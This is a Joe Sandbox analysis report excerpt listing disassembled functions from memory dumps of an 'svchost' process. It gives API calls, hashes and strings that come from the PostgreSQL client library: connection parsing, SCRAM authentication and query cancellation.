                                                                                            Function 00007FFDA36D8450 Relevance: 51.0, APIs: 19, Strings: 10, Instructions: 283COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36D8370: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36DA885,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D8382
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFDA36D5228), ref: 00007FFDA36D849A
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA36D5228), ref: 00007FFDA36D84C7
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA36D5228), ref: 00007FFDA36D84DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdupmalloc
                                                                                            • String ID: 1$=$invalid connection option "%s"$missing "=" after "%s" in connection info string$out of memory$prefer$require$requiressl$sslmode$unterminated quoted string in connection info string
                                                                                            • API String ID: 111713529-5897758
                                                                                            • Opcode ID: e8a365f9cffea4c3eeff60c20e8e343235bdf29771b951907f6b63c2a3cd0336
                                                                                            • Instruction ID: 0923c65a7a1f77a265d5ef84f7a05cb65dbf3c8946aabbdd07e1228d5292c6c8
                                                                                            • Opcode Fuzzy Hash: e8a365f9cffea4c3eeff60c20e8e343235bdf29771b951907f6b63c2a3cd0336
                                                                                            • Instruction Fuzzy Hash: 4CC19F12B0FA9685FB518B2294383B92792AF05FC4F4C6471CA4E6B397DE3EE445C358
                                                                                            Function 6600FE20 Relevance: 49.8, APIs: 33, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81229fecc24b067ea88d046a344f246caa5a6082d2b12f0638a9598128be766e
                                                                                            • Instruction ID: 3ae960784052259f68836a92b6ea440df88694ff670b60e23fc08fce96eb43a3
                                                                                            • Opcode Fuzzy Hash: 81229fecc24b067ea88d046a344f246caa5a6082d2b12f0638a9598128be766e
                                                                                            • Instruction Fuzzy Hash: 5DA1D03225DB458BE210DFA5E88475EBBA4FB86B98F815632EEA943744CF3DC851C740
                                                                                            Function 6600D930 Relevance: 49.7, APIs: 33, Instructions: 154COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: a664d7ad1bf174364580892af68237473766951aeb5b38876afadbe87ab5ddf1
                                                                                            • Instruction ID: d0b1ef4228df365b1d52f9df911d764cf1a668cc10f66dbc33eca963423bb4af
                                                                                            • Opcode Fuzzy Hash: a664d7ad1bf174364580892af68237473766951aeb5b38876afadbe87ab5ddf1
                                                                                            • Instruction Fuzzy Hash: 4231A32266E0554BE214A7FC98A83AEEF41CB87398BC47F33DA5C477C4DA9CCD818111
                                                                                            Function 00007FFDA36E1850 Relevance: 48.3, APIs: 15, Strings: 17, Instructions: 270COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cannot determine OID of function %s$lo_close$lo_creat$lo_create$lo_lseek$lo_lseek64$lo_open$lo_tell$lo_tell64$lo_truncate$lo_truncate64$lo_unlink$loread$lowrite$out of memory$query to initialize large object functions did not return data$select proname, oid from pg_catalog.pg_proc where proname in ('lo_open', 'lo_close', 'lo_creat', 'lo_create', 'lo_unlink', 'lo_lseek', 'lo_lseek64', 'lo_tell', 'lo_tell64', 'lo_truncate', 'lo_truncate64', 'loread', 'lowrite') and pronamespace = (select oid fro
                                                                                            • API String ID: 0-3822070938
                                                                                            • Opcode ID: 3bd6c99e676938b7085dfb915d1f755ebe87c391fc0eab0a9fd4b6a6e3a3b429
                                                                                            • Instruction ID: 3123d59baa4703b0daec54c1c6d0b064df588f6851887c9d37bdcc6f0e2d3e5f
                                                                                            • Opcode Fuzzy Hash: 3bd6c99e676938b7085dfb915d1f755ebe87c391fc0eab0a9fd4b6a6e3a3b429
                                                                                            • Instruction Fuzzy Hash: 52C18D62B0F64686FA208B21D4301B963A3EF55B84F6C7135D90E26397EF7EE158D708
                                                                                            Function 6600FBB0 Relevance: 48.2, APIs: 32, Instructions: 212COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b681729c5e79879584a3963ac308c5ae251d2ca0c77102b9d37f02dd63d37db
                                                                                            • Instruction ID: b5b9b8ff40cf44f46394f824c180200da0c7daba8bd9d54ff503ed906d01fb9e
                                                                                            • Opcode Fuzzy Hash: 1b681729c5e79879584a3963ac308c5ae251d2ca0c77102b9d37f02dd63d37db
                                                                                            • Instruction Fuzzy Hash: 305101722596058AE7109FB5988475EBF64FB86B9CF806A32DE2C47384CF78CC41D244
                                                                                            Function 6600E450 Relevance: 48.1, APIs: 32, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 63682c602be7e039b7e69b245d11a7e1a7aefea3a1e3f4ff280d37df522ed05a
                                                                                            • Instruction ID: 39f253af199c0721dd0a841c389f06245f4c91b1f3426234885be84ee1a888d9
                                                                                            • Opcode Fuzzy Hash: 63682c602be7e039b7e69b245d11a7e1a7aefea3a1e3f4ff280d37df522ed05a
                                                                                            • Instruction Fuzzy Hash: 4C21F7424AE0AA4F9211A3F84CA836EAF108B5731DBC83F73E56C47392CB8DCD509651
                                                                                            Function 00007FFDA36D7ED0 Relevance: 47.6, APIs: 24, Strings: 3, Instructions: 309COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D7FA4
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00007FFDA36D7FB8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8064
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8078
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8094
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D80A8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8152
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D815C
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8194
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D81A8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D81B6
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D81BF
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8204
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8218
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8247
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D825B
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8284
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8298
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D82B4
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D82C8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D82F4
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8308
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8329
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00007FFDA36D833D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdup
                                                                                            • String ID: dbname$invalid connection option "%s"$out of memory
                                                                                            • API String ID: 2653869212-1314129510
                                                                                            • Opcode ID: f5408ca813a42b3ef6f7a598e279f63f3b83428493f5e4a10dc021c0c1bfddf1
                                                                                            • Instruction ID: 8d71f7315f0a69efdb56bfc938c5b5836e9dcb8fbcde693c8ce8a52a167dce1d
                                                                                            • Opcode Fuzzy Hash: f5408ca813a42b3ef6f7a598e279f63f3b83428493f5e4a10dc021c0c1bfddf1
                                                                                            • Instruction Fuzzy Hash: E3D15F23B0AE8285FB549F21D4643B927A2EB45FC4F4C6435CA0E6A796DF3ED485C348
                                                                                            Function 6600E510 Relevance: 46.6, APIs: 31, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: d5869089b7538650f93e8616bfd7583218181241b394b9961a5364e3f8ad7780
                                                                                            • Instruction ID: 03f406f6b236e454a9f4d31ac2eb541cc2217968f409fbce2251508133426ba2
                                                                                            • Opcode Fuzzy Hash: d5869089b7538650f93e8616bfd7583218181241b394b9961a5364e3f8ad7780
                                                                                            • Instruction Fuzzy Hash: 141146559AE06A8BA610A3F84CA83AEEF408F9735D7D43F33D81C477909BDCCC915552
                                                                                            Function 66010200 Relevance: 39.2, APIs: 26, Instructions: 181COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd8fcd89a24216c047be750cc5224a058dc707010c3e0da2b1786282fe694ccf
                                                                                            • Instruction ID: 574f5ddffc6bb407740e15ad5975e7d4628a6afe26436139f9963368e3c94f9d
                                                                                            • Opcode Fuzzy Hash: cd8fcd89a24216c047be750cc5224a058dc707010c3e0da2b1786282fe694ccf
                                                                                            • Instruction Fuzzy Hash: C0410B2165E5458BE6009BE58898B5EFF98FB067D8BC52932DE5E47340DF78CC52C380
                                                                                            Function 00007FFDA36D11A0 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 270COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$libintl_dgettext
                                                                                            • String ID: ,,n=,r=%s$SCRAM-SHA-256-PLUS$could not encode nonce$could not generate nonce$could not verify server signature: %s$error received from server in SCRAM exchange: %s$incorrect server signature$invalid SCRAM exchange state$malformed SCRAM message (empty message)$malformed SCRAM message (garbage at end of server-final-message)$malformed SCRAM message (invalid server signature)$malformed SCRAM message (length mismatch)$out of memory$p=tls-server-end-point
                                                                                            • API String ID: 2163055111-3039780039
                                                                                            • Opcode ID: fa4a2e4af99a1d5292963634b54f110a9bfa9d3d816a9145af9d4e2025d15e3b
                                                                                            • Instruction ID: 954a9bc64648b8f0b4d0577a27781ef73d75448f7ddc7776f4cbf87b78015c47
                                                                                            • Opcode Fuzzy Hash: fa4a2e4af99a1d5292963634b54f110a9bfa9d3d816a9145af9d4e2025d15e3b
                                                                                            • Instruction Fuzzy Hash: A9C1A362B0EA8689FA549B11D4703B92762BF457C0F4C6031DA4E27797DFBEE445C308
                                                                                            Function 00007FFDA36D5820 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 156networkstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$closesocketsocketstrncat
                                                                                            • String ID: PQcancel() -- WSAIoctl(SIO_KEEPALIVE_VALS) failed: $PQcancel() -- connect() failed: $PQcancel() -- no cancel object supplied$PQcancel() -- send() failed: $PQcancel() -- socket() failed: $error $gfff
                                                                                            • API String ID: 3025912874-344502696
                                                                                            • Opcode ID: 1573148f15ac375fbaf4c0bc4df01dfdff759a82d90a0f71a6f006e318c2109d
                                                                                            • Instruction ID: 4b872187ac8160070f12b59c45509e3992cfbec8a088870f9a82e25c16e8eaea
                                                                                            • Opcode Fuzzy Hash: 1573148f15ac375fbaf4c0bc4df01dfdff759a82d90a0f71a6f006e318c2109d
                                                                                            • Instruction Fuzzy Hash: B561C422B0AA5287F7148B25E42437827A2FF45B90F4C6231DA1E67BD6DF3EE404C758
                                                                                            Function 660104B0 Relevance: 37.6, APIs: 25, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 76516bc330bf5717072f54d72c4cd070579e2d4aae22bd874a6b687f913bfa06
                                                                                            • Instruction ID: e17ba4ed0251743d4c0d0efd89c0b218fee602218e1488ca7f42eb18db0cee42
                                                                                            • Opcode Fuzzy Hash: 76516bc330bf5717072f54d72c4cd070579e2d4aae22bd874a6b687f913bfa06
                                                                                            • Instruction Fuzzy Hash: 42019E519AE02A8B9510B3F85CA83AEDF408F5735CBC43F33D85C47B908B9CCC929112
                                                                                            Function 00007FFDA36F5730 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 138stringfilewindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$CreateDirectorystrchr$ByteCharCloseControlDeviceFileFormatFreeHandleLocalMessageMultiRemoveWide__acrt_iob_funclibintl_gettext
                                                                                            • String ID: \??\$\??\%s$could not set junction for "%s": %s
                                                                                            • API String ID: 4293683917-1643559437
                                                                                            • Opcode ID: cda09ec69d1d377b6f4f3d2055efd757c6d8233b465d06b524f0df8bf2f89b0e
                                                                                            • Instruction ID: fee2e3fa09c81fb861e9803ff76dce038747a957b4fb5701d9a6ab7eccd5159b
                                                                                            • Opcode Fuzzy Hash: cda09ec69d1d377b6f4f3d2055efd757c6d8233b465d06b524f0df8bf2f89b0e
                                                                                            • Instruction Fuzzy Hash: CC51A43170AB8286F7209F10E8247AA7762FF88754F481235DA9D67B96DF3ED5058B08
                                                                                            Function 00007FFDA36D16C0 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 185stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1708
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1750
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1761
                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D17C8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D17EB
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1816
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D181F
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D185E
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1867
